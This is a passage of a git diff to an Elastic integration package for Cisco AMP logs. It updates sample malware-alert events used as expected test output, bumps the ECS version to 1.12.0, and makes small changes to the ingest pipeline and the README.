Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179209167470601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3216,7 +3216,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -3248,7 +3248,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854062787Z", + "ingested": "2021-09-13T18:07:55.452613080Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":894000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419179204872503300\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":3020,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -3318,7 +3318,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -3346,7 +3346,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854064627Z", + "ingested": "2021-09-13T18:07:55.452614986Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583840597369422000,\"timestamp\":1610621973,\"timestamp_nanoseconds\":231000000,\"date\":\"2021-01-14T10:59:33+00:00\",\"event_type\":\"Malicious Activity Detection\",\"event_type_id\":1090519105,\"detection\":\"W32.MAP.Ransomware.rewrite\",\"detection_id\":\"6583840593074454529\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mscorsvw.exe\",\"file_path\":\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\mscorsvw.exe\",\"identity\":{\"sha256\":\"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0\",\"sha1\":\"c78f4c22dd195a1791472a2c271a0c85b53900d9\",\"md5\":\"75a758a0c5cea48c9922d64a113d0f9d\"},\"parent\":{\"process_id\":480,\"disposition\":\"Clean\",\"file_name\":\"services.exe\",\"identity\":{\"sha256\":\"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536\",\"sha1\":\"ff658a36899e43fec3966d608b4aa4472de7a378\",\"md5\":\"71c85477df9347fe8e7bc55768473fca\"}}}}}", "kind": "alert", "action": "Malicious Activity Detection", @@ -3410,7 +3410,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3430,7 +3430,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854066521Z", + "ingested": "2021-09-13T18:07:55.452616892Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6701398782847286000,\"timestamp\":1610621970,\"timestamp_nanoseconds\":182000000,\"date\":\"2021-01-14T10:59:30+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621970,\"start_date\":\"2021-01-14T10:59:30+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.\",\"short_description\":\"W32.PossibleRansomwareShadowCopyDeletion.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"vssadmin.exe\",\"file_path\":\"file:///C%3A/Windows/SysWOW64/vssadmin.exe\",\"identity\":{\"sha256\":\"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0\"}}}}}", "kind": "alert", "start": "2021-01-14T10:59:30.000Z", @@ -3496,7 +3496,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3516,7 +3516,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854068405Z", + "ingested": "2021-09-13T18:07:55.452618792Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":7007136036637603000,\"timestamp\":1610621707,\"timestamp_nanoseconds\":260000000,\"date\":\"2021-01-14T10:55:07+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621707,\"start_date\":\"2021-01-14T10:55:07+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.\",\"short_description\":\"W32.PowershellEncodedBuffer.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"file:///C%3A/Windows/system32/cmd.exe\",\"identity\":{\"sha256\":\"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536\"}}}}}", "kind": "alert", "start": "2021-01-14T10:55:07.000Z", @@ -3582,7 +3582,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3602,7 +3602,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:23.854070258Z", + "ingested": "2021-09-13T18:07:55.452620699Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1476905066250000100,\"timestamp\":1610621237,\"timestamp_nanoseconds\":250000000,\"date\":\"2021-01-14T10:47:17+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610621237,\"start_date\":\"2021-01-14T10:47:17+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Kovter\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"b6:9c:d0:89:b8:66\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff\"}}}}}", "kind": "alert", "start": "2021-01-14T10:47:17.000Z", @@ -3668,7 +3668,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3688,7 +3688,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854072129Z", + "ingested": "2021-09-13T18:07:55.452622602Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1476905066228000300,\"timestamp\":1610621237,\"timestamp_nanoseconds\":228000000,\"date\":\"2021-01-14T10:47:17+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621237,\"start_date\":\"2021-01-14T10:47:17+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Kovter\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"b6:9c:d0:89:b8:66\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff\"}}}}}", "kind": "alert", "start": "2021-01-14T10:47:17.000Z", @@ -3747,7 +3747,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3767,7 +3767,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:23.854074002Z", + "ingested": "2021-09-13T18:07:55.452624523Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411425813945647106\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -3822,7 +3822,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3842,7 +3842,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:23.854075908Z", + "ingested": "2021-09-13T18:07:55.452626393Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411425813945647105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", "kind": "alert", "action": "Retrospective Quarantine", @@ -3895,7 +3895,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3919,7 +3919,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:23.854077773Z", + "ingested": "2021-09-13T18:07:55.452628302Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":742000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411425813945647106\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"AySxs.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\AySxs.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", "kind": "alert", "action": "Retrospective Detection", diff --git a/packages/cisco_amp/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_amp/data_stream/log/elasticsearch/ingest_pipeline/default.yml index 8d326db7306..0deeae80697 100644 --- a/packages/cisco_amp/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_amp/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -16,11 +16,6 @@ processors: field: json.data target_field: cisco.amp ignore_missing: true -- remove: - field: - - "@timestamp" - ignore_missing: true - if: ctx?.cisco?.amp?.timestamp != null - date: field: cisco.amp.timestamp formats: @@ -35,7 +30,7 @@ processors: value: '{{_ingest.timestamp}}' - set: field: ecs.version - value: '1.11.0' + value: '1.12.0' - set: field: event.kind value: alert diff --git a/packages/cisco_amp/docs/README.md b/packages/cisco_amp/docs/README.md index 4a510396534..334ebbae376 100644 --- a/packages/cisco_amp/docs/README.md +++ b/packages/cisco_amp/docs/README.md @@ -181,7 +181,7 @@ An example event for `log` looks as following: | destination.ip | IP address of the destination (IPv4 or IPv6). | ip | | destination.port | Port of the destination. | long | | ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | -| error.message | Error message. | text | +| error.message | Error message. | match_only_text | | event.action | The action captured by the event. This describes the information in the event. It is more specific than `event.category`. Examples are `group-add`, `process-started`, `file-created`. The value is normally defined by the implementer. | keyword | | event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | | event.code | Identification code for this event, if one exists. Some event sources use event codes to identify messages unambiguously, regardless of message language or wording adjustments over time. An example of this is the Windows Event ID. | keyword |